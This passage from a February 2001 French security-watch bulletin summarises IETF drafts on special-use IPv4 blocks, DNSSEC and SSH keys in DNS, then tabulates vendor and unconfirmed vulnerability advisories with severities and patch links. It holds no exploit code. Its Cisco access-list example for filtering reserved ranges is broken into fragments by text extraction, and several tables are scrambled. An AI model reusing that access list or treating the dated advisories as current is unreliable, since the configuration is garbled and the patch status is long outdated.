devant être considéré comme document de référence vient d'être résolu par la publication d'une 'nouvelle' version.
'Documenting Special Use Ipv4 Address blocks', draft de 3 pages, propose un récapitulatif clair, précis et fort
bien documenté des caractéristiques de certaines plages d'adresse Ipv4:
0.0.0.0/8
adresses historiques de broadcast
127.0.0.0/8
adresses de 'LoopBack'
192.0.2.0/24
adresses de test (Bloc TEST-NET)
10.0.0.0/8
adresses RFC1918 non routables sur l'INTERNET
172.16.0.0/12
192.168.0.0/16
169.254.0.0/16 adresses utilisables en mode DHCP dégradé non routable sur l'INTERNET
Classe D
adresses de multicast
Classe E
adresses dont l'utilisation n'a jamais été clairement spécifiée
Un exemple de liste de contrôle d'accès traitant la problématique liée aux caractéristiques de ces plages est proposé
par Bill Manning, l'auteur du Draft:
...
Page 19/42
Février 2001
access-list 100 deny ip host
0.0.0.0
any
access-list 100 deny ip 127.0.0.0
0.255.255.255
255.0.0.0
0.255.255.255
0.255.255.255
255.0.0.0
0.255.255.255
0.15.255.255
255.240.0.0
0.15.255.255
0.0.255.255
255.255.0.0
0.0.255.255
0.0.0.255
255.255.255.0 0.0.0.255
0.0.255.255
255.255.0.0
0.0.255.255
15.255.255.255
any
access-list 100 permit ip any
any
...
Ce document doit figurer en bonne place dans la bibliothèque de référence de tout exploitant d'un réseau IP !
ftp://ftp.nordu.net/internet-drafts/draft-manning-dsua-06.txt
DRAFT-LEWIS-STATE-OF-DNSSEC-00
Notes from the State-Of-The-Technology: DNSSEC
Publié en tant que draft de l'IETF, ce document contient la synthèse des idées échangées lors d'une réunion plénière
des groupes de normalisation ayant à travailler dans le domaine de la sécurité du DNS (DNSSEC). Historiquement
inscrit au programme d'étude de deux groupes complémentaires, les résultats des premiers travaux ont conduit à
l'édition du RFC 2535 'Domain Name System Security Extensions'. Les principes développés ont ensuite été
intégrés partiellement dans l'implémentation ISC BIND V8.2, la version 9.0 étant la première implémentation
totalement conforme au RFC 2535.
La terminologie DNSSEC ne désigne pas une technologie monolithique mais plutôt un ensemble de composantes
techniques et méthodologiques qui, une fois assemblées, permettront d'offrir un service de nom sûr. Cependant, la
vitesse de progression des travaux diffère d'une composante à l'autre. C'est notamment le cas du mécanisme de
signature des transferts (TSIG ou Transaction SIGnature) qui a désormais atteint un niveau de maturité autorisant
le déploiement.
A ce jour, quatre composantes sont intégrées à DNSSEC qui répondent à quatre besoins différenciés:
1. La sécurité de l'ensemble du trafic à l'échelle de l'INTERNET: utilisation d'un mécanisme de signature digitale
(RFC 3008 - 'Domain Name System Security Signing Autority'),
2. La sécurisation des requêtes et réponses à une échelle locale mais nécessitant un bon niveau de performance:
utilisation du mécanisme de signature TSIG (RFC 2845 - 'Secret Key Transaction Authentication for DNS'),
3. La protection des mises à jour dynamique d'un serveur de nom: utilisation du même mécanisme TSIG (RFC
3007 - 'Secure Domain System Dynamic Update'),
4. Enfin, le stockage et la distribution d'éléments de sécurité: définition de la ressource dédiée CERT (RFC 2538 'Storing Certificate in the Domain Name System')
Les sociétés ou organismes suivant étaient représentés lors de la réunion plénière, chacun ayant la responsabilité
d'un domaine:
NLnet LABS (US) en charge de l'étude des procédures liées à la gestion des clefs associées aux TLD (Top Level
Domain),
Verisign (US) en charge de l'étude des services associés à DNSSEC dont la validation des clefs des domaines
délégués,
la Foundation for Internet Infrastructure (suède) responsable de l'examen des problèmes administratifs liés
à DNSSEC mais aussi des outils d'aide au déploiement
le RSSAC (Root Server System Advisory Commitee) dont l'étude a permis de validé la maturité du mécanisme
TSIG,
le CAIRN (Collaborative Advanced Interagency Research Network) qui étudie les moyens de maintenir une
chaîne de confiance lorsque qu'une partie de l'arborescence DNS n'est plus active ou non encore sécurisée,
le NIST qui collecte des mesures de performance afin de vérifier la capacité du DNS existant à supporter la
charge supplémentaire induite par les mécanismes DNSSEC,
la DISA (US Defense Information Systems Agency) supporte les coûts d'intégration de DNSSEC dans
l'implémentation BIND dans l'optique de déployer la version sécurisé au sein de la Défense américaine,
le RIPE NCC qui s'intéresse plus particulièrement au déploiement de DNSSEC dans le domaine dédié à la
résolution inverse 'in-addr.arpa',
NAI qui est le premier membre qui ne soit pas un FAI à mettre en œuvre un DNS conforme à DNSSEC sur le
domaine 'tislabs.com',
Ip6.int dont les serveurs de racine sont en cours de migration pour supporter les enregistrements CERT et
TSIG,
TBDS (Topology Based Domain Search) qui étudie les techniques permettant au futur DNS de continuer à
fonctionner en zones susceptibles d'être déconnectées.
Nous noterons que si les intentions des groupes de travail sont louables - la présente note d'information le démontre
- il semble cependant que les travaux en cours visent plus à corriger, localement et au coup par coup, les
défaillances d'un procotole (voire d'une infrastructure) devenu vitale. Le problème de fond n'est pas de savoir si l'on
peut faire évoluer et sécuriser cette infrastructure tentaculaire mais plutôt de savoir combien de temps celle-ci
Page 20/42
Février 2001
résistera aux multiples aménagements. En un mot, ne va-t-on pas vers une fragilisation globale du système en
tentant de l'aménager sans envisager de le remplacer ?
ftp://ftp.nordu.net/internet-drafts/draft-lewis-state-of-dnssec-00.txt
DRAFT-GRIFFIN-SSH-HOST-KEYS-IN-DNS-00
Storing SSH Host Keys in DNS
L'une des extensions du DNS décrites dans le RFC 2535 'Domain Name System Security Extensions' peut être
mise à profit pour créer une infrastructure - privée ou publique - de stockage et de distribution d'éléments de
sécurité. Ainsi, l'auteur du document 'Storing SSH Host Keys in DNS' suggère d'utiliser la ressource KEY comme
lieu de stockage des clefs publiques des serveurs utilisant le service SSH. L'objectif est double: offrir à la fois un
service simple et efficace permettant à la fois de distribuer les clefs et de contrôler l'authenticité de celles-ci.
Un tel service permettrait de contrer les attaques de type 'man-in-the-middle' en offrant un moyen de vérification
alternatif pour ne pas dire de confiance car partagé par un grand nombre d'utilisateurs. Rappelons qu'une attaque de
ce type, portant sur SSL et basée sur l'acceptation 'aveugle' d'un certification invalide, a défrayée la chronique
dernièrement.
Deux méthodes de vérification de l'authenticité et de l'intégrité de la clef sont exploitables:
1. Par la vérification de la zone DNSSEC contenant le nom du système. Ceci suppose que le client soit configuré
pour assurer cette vérification, et dispose en conséquence, de la clef de la dite zone,
2. Effectuer une requête sécurisée - méthode SIG(0) (RFC 2931) ou TSIG (RFC 2845) - vers un serveur de nom.
Cette proposition a le mérite de fournir une solution simple et efficace car intégrée à un service indispensable au bon
fonctionnement du protocole SSH. Bien entendu, cette solution nécessite que les serveurs SSH soient inscrits dans
une zone DNS sécurisée et gérée par un DNS conforme à la spécification DNSSEC. Les clients SSH devront être
adaptés pour traiter assurer un contrôle systématique de l'authenticité de la clef publique avant utilisation.
ftp://ftp.nordu.net/internet-drafts/draft-griffin-ssh-host-keys-in-dns-00.txt
Page 21/42
Février 2001
ALLEER
RT
TE
ES
SE
ET
T AT
TT
TA
AQ
QU
UE
ES
S
ALERTES
GUIDE DE LECTURE
La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas
toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi
transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en
forme de ces informations peuvent être envisagées :
Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de
l’origine de l’avis,
Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles.
La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant
donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une
synthèse des avis classée par organisme émetteur de l’avis.
Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique
résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces
sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et
publiquement accessible sont représentés.
Avis Spécifiques
Constructeurs
Réseaux
3Com
Cisco
Systèmes
Avis Généraux
Editeurs
Systèmes
Compaq
Indépendants
Editeurs
Linux
Hackers
Microsoft
HP
FreeBSD
IBM
NetBSD
SGI
OpenBSD
SUN
SCO
l0pht
Netscape
rootshell
Editeurs
Organismes
Autres
US
Autres
Aus-CERT
AXENT
BugTraq
CERT
ISS
@Stake
CIAC
Typologies des informations publiées
Publication de techniques et de programmes d’attaques
Détails des alertes, techniques et programmes
Synthèses générales, pointeurs sur les sites spécifiques
Notifications détaillées et correctifs techniques
L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes :
Recherche d’informations générales et de tendances :
Lecture des avis du CERT et du CIAC
Maintenance des systèmes :
Lecture des avis constructeurs associés
Compréhension et anticipation des menaces :
Lecture des avis des groupes indépendants
Aus-CERT
CERT
3Com
Compaq
Microsoft
BugTraq
rootshell
AXENT
NetBSD
Cisco
HP
Netscape
@Stake
l0pht
ISS
OpenBSD
IBM
Xfree86
SGI
Linux
SUN
FreeBSD
CIAC
Page 22/42
Février 2001
FORMAT DE LA PRÉSENTATION
Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme
de tableaux récapitulatifs constitués comme suit:
Présentation des Alertes
EDITEUR
TITRE
Description sommaire
Gravité
Date Informations concernant la plate-forme impactée
Produit visé par la vulnérabilité Description rapide de la source du problème
Correction
URL pointant sur la source la plus pertinente
Référence
Présentation des Informations
SOURCE
TITRE
Description sommaire
URL pointant sur la source d'information
SYNTHESE MENSUELLE
Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en
cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille.
L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents
organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution.
Période du 27/01/2001 au 23/02/2001
Organisme
CERT-CA
CERT-IN
CIAC
Constructeurs
Cisco
HP
IBM
SGI
Sun
Editeurs
Allaire
Microsoft
Netscape
Sco
Unix libres
Linux RedHat
Linux Debian
Linux Mandra.
FreeBSD
Autres
@Stake
Safer
X-Force
Période
21
2
0
19
10
1
6
2
0
1
10
0
9
0
1
34
6
8
7
13
4
3
0
1
Cumul
2001 2000
25
118
3
22
1
10
21
86
14
77
1
13
8
28
3
17
0
12
2
7
15
155
2
32
12
100
0
7
1
16
76
226
10
137
20
66
23
-23
23
11
38
5
10
4
1
2
27
Cumul 2001 - Constructeurs
SGI
0% Sun
14%
IBM
21%
Cisco
7%
HP
58%
Cumul 2001 - Editeurs
Netscape
Sco Allaire
0%7% 13%
Microsoft
80%
Cumul 2000 - Constructeurs
SGI
16%
IBM
22%
Sun
9%
Cisco
17%
HP
36%
Cumul 2000 - Editeurs
Netscape
5%
Sco
10%
Allaire
21%
Microsoft
64%
Page 23/42
Février 2001
ALERTES DÉTAILLÉES
AVIS OFFICIELS
Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme
fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être
considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent
immédiatement être appliqués.
BORDERWARE
Déni de service contre 'Borderware'
Il est possible de provoquer à distance un déni de service sur les serveurs fonctionnant avec 'Borderware'.
Forte
26/01 Borderware firewall server version 6.1.2
Réponse aux requêtes 'ping' en broadcast
Correctif existant Serveur 'ping'
http://www.securityfocus.com/archive/1/158746
Bugtraq
CERT
Vulnérabilités multiples dans 'BIND'
Le CERT annonce, en coopération avec Covert Labs, quatre vulnérabilités dans BIND.
Critique 29/01 ISC BIND versions 4.9.x inférieures à 4.9.8ISC BIND versions 8.2.x inférieures à 8.2.3
Mauvaise initialisation des variables
Correctif existant BIND 8: TSIG
CERT CA-2001-02
CIAC L-030
ISC BIND
PGP COVERT Labs
Bugtraq
Débordement de buffer
BIND 4: nslookupComplain()
Non vérification des paramètres d'entrée
BIND 4: nslookupComplain()
Accès à la pile programme
BIND X: Pile programme
http://www.cert.org/advisories/CA-2001-02.html
http://ciac.llnl.gov/ciac/bulletins/l-030.shtml
http://www.isc.org/products/BIND/bind-security.html
http://www.pgp.com/research/covert/advisories/047.asp
http://www.securityfocus.com/bid/2302http://www.securityfocus.com/bid/2302
COMPAQ
Vulnérabilité dans 'Compaq Web-Enabled Management'
Une vulnérabilité de type débordement de buffer, exploitable à distance, peut mener un utilisateur à acquérir les
droits root ou administrateur.
Forte
07/02 WebManagement sur architecture Intel ou Alpha: Windows 9x, NT, 2000, NetWare, SCO Open Server, SCO
Correctif existant
Compaq
CIAC
UnixWare 7, RedHat 6.2 et 7.0, Tru64Unix, OpenVMS
Web-Enabled Management'
Erreur dans la vérification de la taille des données
http://www.compaq.com/products/servers/management/agentsecurity.html
CISCO
Vulnérabilités dans CSS (Cisco Content Services)
Deux vulnérabilités existent dans les commutateurs CSS, aussi appelés 'Arrowpoint'.
Forte
31/01 Cisco CSS 11050, CSS 11150 et CSS 11800
Débordement de buffer
Correctif existant Cisco WebNS
http://www.cisco.com/warp/public/707/arrowpoint-cli-filesystem-pub.shtml
CSCdt08730
CSCdt12748
FreeBSD
Vulnérabilité dans 'inetd' (serveur 'ident')
Il est possible de lire à distance une partie de certains fichier via le serveur ident.
Moyenne 29/01 FreeBSD 3.x (toutes versions)FreeBSD 4.x (toutes versions)
Non disponible
Correctif existant 'inetd' (serveur 'ident')
http://www.linuxsecurity.com/advisories/freebsd_advisory-1107.html
FreeBSD-SA01:11
http://www.ciac.org/ciac/bulletins/l-038.shtml
CIAC L-030
HP
Vulnérabilité dans le 'JRE' de SUN (sous MPE/ix)
HP émet son propre bulletin afin d'orienter les utilisateurs sous MPE/ix vers les versions immunes de 'JRE'.
Critique 20/02 MPE/iX versions 6.0, 6.5 ou 7.0 sous HP e3000
Non disponible
Correctif existant Java Runtime Environment
HPSBMP0102-010 http://home2.itrc.hp.com/hm/
Bugtraq
Page 24/42
Février 2001
Vulnérabilité dans 'NM debug'
Un utilisateur peut acquérir certains privilèges en utilisant 'NM Debug'.
Forte
20/02 MPE/iX versions 5.5 et supérieures sous HP3000
Non respect des points d'arrêt
Correctif existant 'NM Debug'
Bugtraq
Vulnérabilité dans 'linkeditor'
Un utilisateur peut acquérir certains privilèges réservés à l'administrateur système grâce à 'linkeditor'.
Forte
20/02 MPE/iX versions 5.5 et supérieures sous HP3000
Non disponible
Correctif existant 'linkeditor'
Bugtraq
Vulnérabilité dans 'man'
Il existe une vulnérabilité dans la commande 'man' pouvant conduire un utilisateur à provoquer un déni de service.
Forte
29/01 HP9000 Series 700 et 800 sousHP-UX versions 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01
Non disponible
Correctif existant Commande 'man'
HPSBUX0101-138 http://europe-support.external.hp.com/
CIAC L-030
Vulnérabilité dans 'iPlanet 4.x'
Une vulnérabilité exploitable à distance rend instable 'iPlanet 4.x' avec VirtualVault 4.0 lors de requêtes https.
Forte
11/02 HP-UX 11.04 (VVOS) avec VirtualVault A.04.00 surHP9000 Series 7/800
Non disponible
Correctif existant iPlanet Web Server
HPSBUX0102-139 http://europe-support.external.hp.com/
Débordement de buffer dans plusieurs éditeurs de texte
HP vient de publier un bulletin annonçant un débordement de buffer dans plusieurs éditeurs de texte.
Moyenne 15/02 HP-UX versions 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01sur HP9000 Séries 700 et 800
Non vérification des paramètres
Correctif existant Editeurs de texte
HPSBUX0102-140 http://europe-support2.external.hp.com/
LINUX
Déni de service dans 'proftpd'
Un utilisateur distant peut provoquer un déni de service sur ProFTPD via les commandes 'SIZE' ou 'USER'.
Forte
08/02 Linux Mandrake 7.2 et Debian GNU/Linux 2.2
Surconsommation de mémoire
Correctif existant Commandes 'SIZE' ou 'USER'
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-021.php3
MDKSA2001:021
http://www.debian.org/security/2001/dsa-029
DSA-029-1
Deux vulnérabilités noyau dans 'sysctl' et 'ptrace'
Deux vulnérabilités affectent localement les paquetages 'sysctl' et 'ptrace' des noyaux Linux 2.2 et 2.4.
Forte
08/02 Immunix OS 6.2 et 7.0-beta, OpenLinux 2.3, eServer 2.3.1, eBuilderOpenLinux eDesktop 2.4
Mauvaise vérification des données passées en paramètres
Correctif existant sysctl
CSSA-2001-009.0
2001-70-002-01
ptrace
Conflit d'accès au ressources (race condition)
http://www.linuxsecurity.com/advisories/caldera_advisory-1141.html
http://www.linuxsecurity.com/advisories/other_advisory-1147.html
LINUX DEBIAN
Plusieurs vulnérabilités dans 'xfree86-1'
Plusieurs vulnérabilités dans 'xfree86-1' de type débordement de buffer, déni de service, 'symlink' peuvent être
exploitées à distance.
Critique 12/02 Linux Debian 2.2, 2.2r1, (2.2r2)
(cf. Description)
Correctif existant Paquetage 'xfree86-1'
http://www.debian.org/security/2001/dsa-030
DSA-030-1
Bugtraq
LINUX MANDRAKE
Débordement de buffer dans 'XEmacs'
Un débordement de buffer dans 'XEmacs' permet à un utilisateur distant d'éxécuter du code.
Forte
01/02 Linux Mandrake versions 6.0, 6.1, 7.0, 7.1, 7.2 etCorporate Server 1.0.1
Mauvaise vérification des données passées
Correctif existant 'magic cookie'
MDKSA-2001:019 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-019.php3
Page 25/42
Février 2001
Déni de service dans 'cups'
Un utilisateur distant peut provoquer un déni de service dans l'application 'cups'
Forte
01/02 'cups' versions inférieures à 1.1.5 sous Linux Mandrake 7.2
Mauvaise vérification des données passées en entrée
Correctif existant Fonction 'httpGets()'
MDKSA-2001:020 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-020.php3
LINUX REDHAT
Problème dans 'inetd' lors de la fermeture des sockets
Un problème existe dans 'inetd' lors de la fermeture des sockets.
Moyenne 30/01 Red Hat Linux 6.2 (alpha, i386, sparc)
Mauvaise fermeture des sockets
Correctif existant 'inetd'
http://www.linuxsecurity.com/advisories/redhat_advisory-1118.html
Linux Security
Débordement de buffer dans 'crontab'
Une vulnérabilité dans 'cron' permet d'obtenir localement des droits privilégiés.
Moyenne 19/02 Red Hat Linux 5.2, 6.2, 7.0
Mauvaise gestion des données
Correctif existant Commande 'crontab'
http://www.linuxsecurity.com/advisories/redhat_advisory-1159.html
2001:014-03
LINUX SuSE
Vulnérabilité dans 'kdesu'
Il est possible d'acquérir le mot de passe 'root'.
Moyenne 29/01 SuSE 6.0, 6.1, 6.2, 6.3, 6.4, 7.0
Option 'keep password'
Correctif existant Paquetage 'kdesu'
SuSE-SA:2001:02 http://lists.suse.com/archives/suse-security-announce/2001-Jan/0001.html
MICROSOFT
Déni de service sur les serveurs Windows 2000 via RDP
Un utilisateur peut provoquer à distance un déni de service sur les serveurs Windows 2000 en utilisant le protocole
RDP (Remote Desktop Protocol).
Critique 31/01 Microsoft Windows 2000 (Server, Advanced Server)
Mauvaise gestion de certains paquets
Correctif existant Protocole RDP
http://www.microsoft.com/technet/security/bulletin/fq01-006.asp
MS01-006
Vulnérabilité dans 'Network DDE'
Une vulnérabilité dans 'Network DDE' peut conduire un utilisateur local à acquérir des privilèges plus élevés sous
Windows 2000.
Critique 05/02 Microsoft Windows 2000 Professional, Server et Advanced Server
Exécution de requêtes dans le contexte de sécurité 'LocalSystem'
Correctif existant Network DDE
MS01-007
CIAC L-044
Vulnérabilité dans 'Windows Media Player' (WMP)
Une vulnérabilité affectant 'Microsoft Windows Media Player 7' permet d'exécuter du code sur la machine cible via
un site web malicieux distant.
Critique 15/02 Microsoft Windows Media Player 7
'skins' au format '.wmz'
Non vérification des 'skins' téléchargées
Correctif existant
MS01-010
Vulnérabilité dans 'Outlook' et 'Outlook Express'
Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte 'Outlook' et 'Outlook Express'.
Forte
23/02 Microsoft Outlook 97 et 2000Microsoft Outlook Express 5.01 et 5.5
Mauvaise gestion des erreurs lors de l'analyse de 'vCards'
Correctif existant Gestion des 'vCards'
http://www.microsoft.com/technet/security/bulletin/MS01-012.asp
MS01-012
Vulnérabilité dans le traitement des scripts '.HTR'
Il est possible de lire à distance une partie spécifique de certains fichiers d'un serveur web. Il n'est cependant pas
possible d'ajouter, modifier ou effacer un fichier.
Forte
29/01 Microsoft Internet Information Server 4.0Microsoft Internet Information Service 5.0
Non traitement des fichiers 'ASP' (Active Server Pages)
Correctif existant Extension ISAPI '.HTR'
MS01-004
Vulnérabilité dans le service 'NTLMSSP'
Il est possible, à un utilisateur local, d'exécuter un code de son choix sous les droits 'LocalSystem'.
Forte
07/02 Microsoft Windows NT 4.0 WorkstationMicrosoft Windows NT 4.0 Server
Correctif existant NTLM Security Support Provider Exécution de code par le service 'NTLMSSP' sous les droits'LocalSystem'
MS01-008
CIAC L-043
Page 26/42
Février 2001
Déni de service dans le protocole 'PPTP'
Un utilisateur peut provoquer à distance un déni de service sur les serveurs Windows NT 4.0 via le protocole 'PPTP'.
Forte
13/02 Microsoft Windows NT 4.0 Server, Enterprise Edition, Terminal Server Edition
Mauvaise gestion des paquets 'PPTP' malformés
Correctif existant Protocole 'PPTP'
MS01-009
Déni de service sur les contrôleurs de domaines
Il est possible de provoquer à distance un déni de service sur les contrôleurs de domaines sous Windows 2000
Server.
Forte
21/02 Microsoft Windows 2000 Server , Advanced Server, Datacenter Server
Mauvaise gestion des paquets mal formés
Correctif existant Contrôleur de domaine
http://www.microsoft.com/technet/security/bulletin/MS01-011.asp
MS01-011
Anomalies lors de l'installation de certains correctifs
Des anomalies peuvent apparaître lors de l'installation de certains correctifs dans la version en langue Anglaise de
Windows 2000.
Moyenne 31/01 Windows 2000 (Professional, Server, Advanced Server)
Erreur dans les numéro de version des catalogues des SP Windows 2000
Correctif existant Catalogue système
MS01-005
Erreur! Signet non défini.
CIAC L-041
NetBSD
Vulnérabilité dans la validation des arguments 'LDT'
Une vulnérabilité dans la validation des arguments permet localement d'ajouter des segemnts à la Table de
Descripteurs Locale (LDT).
Forte
16/02 Toutes les versions de NetBSD sur architecture Intel i386
Erreur de conception
Correctif existant Appel système 'i386_set_ldt'
http://www.linuxsecurity.com/advisories/netbsd_advisory-1157.html
Linux Security
OPENSSH
Contournement d'authentification dans 'OpenSSH-2.3.1'
Il est possible de se connecter sans s'authentifier dans la version de 'OpenSSH-2.3.1'.
Critique 08/02 OpenSSH-2.3.1
Inexistance du processus d'authentification(challenge/response)
Correctif existant OpenSSH-2.3.1
http://www.linuxsecurity.com/advisories/openbsd_advisory-1148.html
Linux Security
OpenBSD
Débordement de buffer dans 'sudo'
Une vulnérabilité de type débordement de buffer affecte 'sudo'.
Forte
22/02 OpenBSD 2.8
Non disponible
Correctif existant 'sudo'
http://www.openbsd.org/errata.html#sudo
OpenBSD
SCRIPT PHP
Vulnérabilité dans 'NewsDaemon'
Une vulnérabilité dans 'NewsDaemon' peut conduire un utilisateur distant à gagner les droits 'administrateur'.
Forte
16/02 'NewsDaemon' versions inférieures à la 0.21b
Mauvaise vérification des paramètres passés en entrée
Correctif existant Script PHP 'NewsDaemon'
http://www.securiteam.com/unixfocus/NewsDaemon_remote_administrator_access.html
Securiteam
SSH1
Vulnérabilité dans le détecteur d'attaques 'deattack.c'
Une vulnérabilité présente dans la plupart des implémentations de SSH1 permet à un utilisateur d'exécuter du code
distant sur un client ou un serveur SSH.
Critique 08/02 OpenSSH versions inférieures à 2.3.0SSH version ssh-1.2.24 à ssh-1.2.31F-Secure SSH-1.3.xOSSH 1.5.7
Depassement de capacité d'une donnée
Correctif existant 'deattack.c'
Linux Security
SUN
Vulnérabilité dans 'JRE' (Java Runtime Environment)
Une vulnérabilité, présente dans certaines version de 'JRE', peut amener un code malicieux à exécuter certaines
commandes non autorisées.
Critique 21/02 Se référer à l'avis pour la liste des palet-formes
Non disponible
Correctif existant Java Runtime Environment
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/200&type=0&nav=sec.sba
SUN #00201
Bugtraq
Page 27/42
Février 2001
TURBOLINUX
Vulnérabilité dans 'sendmail'
Il est possible de provoquer localement un débordement de buffer lorsque 'sendmail' est lancé avec une option
particulière.
Forte
21/02 Toutes les versions jusqu'à 'sendmail-8.11.2-5' inclus
Exception de type 'segmentation fault'
Correctif existant Option '-bt' de 'sendmail'
http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000033.html
TLSA2001003-1
VIRUS
Apparition et propagation du virus A. Kournikova
Un virus de type ver, appelé VBS Anna Kournikova se répand actuellement sur l'Internet.
Forte
13/02 Toute plate-forme Windows avec Microsoft Outlook installéet autorisant l'exécution de scripts VBS
Exécution de scripts VBS
Correctif existant Virus
CERT CA-2001-03 http://www.cert.org/advisories/CA-2001-03.html
CIAC L-046
FECCIRC 2001-03 http://www2.fedcirc.gov/advisories/FA-2001-03.html
WATCHGUARD
Déni de service dans les pare-feux Firebox II via PPTP
Un utilisateur distant peut provoquer un déni de service en soumettant au pare-feu des paquets PPTP malformés.
Forte
14/02 Watchguard Firebox IIFirmware Policy manager V4.50-B1780, Watchguard product V4.50-612
Mauvaise gestion des paquets 'PPTP' malformés
Correctif existant Protocole 'PPTP'
Bugtraq
WINGATE
Vulnérabilité dans 'Wingate'
Une vulnérabilité présente dans 'Wingate' permet à un utilisateur distant d'utiliser des services sans authentification
préalable.
Critique 25/01 Wingate 4.1.1 sur Windows NT 4.0
Adresse de loopback considérée comme authentifiée
Correctif existant Configuration par défaut
Bugtraq
ALERTES NON CONFIRMEES
Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes
d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces
alertes nécessitent la mise en place d’un processus de suivi et d’observation.
AOL
Vulnérabilité dans 'AOLserver'
Un utilisateur distant peut avoir accès à certains fichiers hors du répertoire racine d'un serveur 'AOLserver'.
Moyenne 06/02 AOLserver 3.2
AOLserver 3.2
Mauvaise vérification des paramètres soumis (URLs)
Aucun correctif
http://www.securityfocus.com/bid/2343
Bugtraq
AT&T
Vulnérabilité dans le client et le serveur 'WinVNC'
Une vulnérabilité exploitable à distance affecte les applications client et serveur de 'WinVNC'.
Forte
29/01 WinVNC Client et Server de version antérieure ou égale à 3.3.3r7
Client:
Paquet 'rfbConnFailed' Mauvaise gestion des données 'rfbConnFailed'
Aucun correctif
Bugtraq
Serveur: Mode debug
Mauvaise journalisation des données HTTP
BORDERWARE
Déni de service contre 'Borderware'
Il est possible de provoquer à distance un déni de service sur les serveurs fonctionnant avec 'Borderware'.
Forte
26/01 Borderware firewall server version 6.1.2
Réponse aux requêtes 'ping' en broadcast
Correctif existant Serveur 'ping'
Bugtraq
Page 28/42
Février 2001
FORE/MARCONI
Déni de service contre les commutateurs 'ASX'
Il est possible de provoquer à distance un déni de service sur les commutateurs 'ASX'.
Forte
19/02 Commutateurs ASX-1000 avec ForeThought 6.2
Protocole (connexion SYN FIN)
Mauvaise gestion des paquets mal formés
Aucun correctif
Bugtraq
GOAHEAD
Vulnérabilité dans 'GoAhead WebServer'
Exécution de code et avoir accès distant à certains fichiers sur un serveur web 'GoAhead WebServer' vulnérable.
Forte
05/02 GoAhead WebServer 2.0 et 2.1
Serveur Web
Mauvaise vérification des paramètres
Aucun correctif
Bugtraq
IBM
Vulnérabilités dans 'NetCommerce'
En soumettant une URL spécialement conçue, un utilisateur distant peut accéder à certaines informations sensibles.
Forte
07/02 IBM NetCommerce versions 3.0 et 3.1.2
Macros activées par défaut
Exécution des macros
Aucun correctif
http://www.securiteam.com/securitynews/IBM_NetCommerce_security_vulnerability.html
Securiteam
LOTUS IBM
Vulnérabilité dans 'Lotus Notes'
Une vulnérabilité dans 'Lotus Notes' peut mener utilisateur expérimenté à manipuler les courriers afin de provoquer
l'exécution de code distant chez le destinataire.
Critique 08/02 Validé sur Lotus Notes V4.6. Les autres versions sont probablement aussi affectées par cette vulnérabilité.
Formulaires PostOpen & Launch Erreur de conception
Aucun correctif
Bugtraq
MICROSOFT
Déni de service sur les clients UDP
Il est possible de provoquer à distance un déni de service sur les clients UDP en faisant exécuter un code malicieux.
Moyenne 06/02 Windows 95, 98, NT et 2000
'java.net.DatagramSocket'
Epuisement des sockets UDP
Aucun correctif
http://www.guninski.com/winudp.html
Guninski #37
NOVELL
Vulnérabilité dans 'Novell NetWare'
'Novell Netware' est vulnérable à une attaque de type 'man-in-the-middle' permettant à un utilisateur malveillant
de récupérer des données sensibles.
Critique 15/02 Novell NetWare 5.0 et 5.1
Processus d'authentification
Mauvaise implémentation du protocole
Aucun correctif
http://razor.bindview.com/publish/advisories/adv_NovellMITM.html
Razor
PGP4PINE
Echec lors d'identification de clés publiques expirées
Une erreur dans le code de 'pgp4pine' lors de l'utilisation d'une clé publique expirée aboutit à la transmission de
données en clair au lieu de notifier l'utilisateur.
Critique 22/02 'pgp4pine-1.75-6' en relation avec GnuPG Version 1.0.4 et Pine Version 4.2.1
'pgp4pine-1.75-6'
Non existence du code permettant de vérifier l'expirationd'une clé publique
Aucun correctif
Linux Security
QNX
Débordement de buffer dans le serveur FTP
Un utilisateur distant peut provoquer un débordement de buffer sur le serveur FTP de la plate-forme temps réel
QNX.
Moyenne 02/02 Serveur FTP 5.60 livré avec QNX 4.25 (version commerciale)
Code source
Mauvaise vérification des paramètres
Aucun correctif
Bugtraq
Page 29/42
Février 2001
SUN
Débordement de
Un utilisateur local
Forte
31/01
Aucun correctif
Bugtraq
buffer dans 'ximp40' sous Solaris
peut provoquer un débordement de buffer afin d'acquérir des privilèges plus élevés.
Sun Solaris 8.0 et 8.0_x86Sun Solaris 7.0 et 7.0_x86
'ximp40.so.2' (libcall)
Mauvaise vérification des paramètres passés en entrée
SUN StarOffice
Vulnérabilité dans 'StarOffice'
Une vulnérabilité de type lien symbolique affecte localement 'StarOffice'.
Moyenne 20/02 'StarOffice' (versions vulnérables non communiquées)
'StarOffice'
Création dangereuse de fichiers temporaires
Aucun correctif
Bugtraq
SYMANTEC
Débordement de buffer dans 'PcAnywhere 9.0'
Un utilisateur distant peut provoquer un déni de service contre 'PcAnywhere'.
